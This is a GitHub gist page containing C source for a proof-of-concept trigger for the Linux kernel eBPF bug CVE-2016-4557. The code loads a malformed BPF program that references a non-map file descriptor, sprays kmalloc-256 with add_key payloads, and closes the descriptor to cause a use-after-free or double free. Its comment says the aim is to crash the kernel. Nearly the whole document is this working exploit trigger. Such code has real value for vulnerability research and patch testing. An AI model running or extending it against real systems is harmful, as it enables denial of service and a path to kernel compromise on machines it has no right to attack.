-
-
Save f0rm2l1n/10e6666a39192470a49bbc1c53b8b1a0 to your computer and use it in GitHub Desktop.
CVE-2016-4557-newtrigger.c
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #define _GNU_SOURCE | |
| #include <errno.h> | |
| #include <err.h> | |
| #include <unistd.h> | |
| #include <fcntl.h> | |
| #include <sched.h> | |
| #include <signal.h> | |
| #include <sys/types.h> | |
| #include <sys/stat.h> | |
| #include <sys/syscall.h> | |
| #include <sys/prctl.h> | |
| #include <linux/bpf.h> | |
| #define PAGE_SIZE (1024) | |
| #ifndef __NR_bpf | |
| # if defined(__i386__) | |
| # define __NR_bpf 357 | |
| # elif defined(__x86_64__) | |
| # define __NR_bpf 321 | |
| # elif defined(__aarch64__) | |
| # define __NR_bpf 280 | |
| # else | |
| # error | |
| # endif | |
| #endif | |
| int do_nothing(void *p) { | |
| prctl(PR_SET_PDEATHSIG, SIGKILL); | |
| while (1) sleep(1); | |
| } | |
| void spray_addkey(int count, int size) { | |
| int i; | |
| char payload[PAGE_SIZE]; | |
| char desc[256]; | |
| memset(payload, 0x41, PAGE_SIZE); // AAAA | |
| for(i = 0; i < count; i++) { | |
| sprintf(desc, "payload%d", i); | |
| syscall(__NR_add_key, "user", desc, payload, size, -2); | |
| } | |
| } | |
| int main(void) { | |
| char buf[4096]; | |
| char child_stack[8000]; | |
| printf("[.] clone the child process\n"); | |
| int child = clone(do_nothing, child_stack + sizeof(child_stack), CLONE_FILES, NULL); | |
| if (child == -1) | |
| err(1, "clone"); | |
| printf("[~] done that\n"); | |
| printf("[.] open read only file\n"); | |
| int uaf_fd = open("/proc/self/maps", O_RDONLY); | |
| if (uaf_fd == -1) | |
| err(1, "unable to open UAF fd"); | |
| printf("[~] done that\n"); | |
| struct bpf_insn insns[2] = { | |
| { | |
| .code = BPF_LD | BPF_IMM | BPF_DW, | |
| .src_reg = BPF_PSEUDO_MAP_FD, | |
| .imm = uaf_fd | |
| }, | |
| { | |
| } | |
| }; | |
| union bpf_attr attr = { | |
| .prog_type = BPF_PROG_TYPE_SOCKET_FILTER, | |
| .insn_cnt = 2, | |
| .insns = (__aligned_u64) insns, | |
| .license = (__aligned_u64)"" | |
| }; | |
| printf("[.] execute bpf system call\n"); | |
| if (syscall(__NR_bpf, BPF_PROG_LOAD, &attr, sizeof(attr)) != -1) | |
| errx(1, "expected BPF_PROG_LOAD to fail, but it didn't"); | |
| if (errno != EINVAL) | |
| err(1, "expected BPF_PROG_LOAD to fail with -EINVAL, got different error"); | |
| printf("[~] done that\n"); | |
| printf("[.] start spraying\n"); | |
| spray_addkey(16, 256); // kmalloc-256 | |
| sleep(3); | |
| spray_addkey(16, 256); | |
| printf("[~] done that\n"); | |
| // wait for the RCU work done | |
| // also should boot spraying | |
| // try to crash | |
| printf("[.] start close the double free fd\n"); | |
| close(uaf_fd); | |
| printf("[~] done that\n"); | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment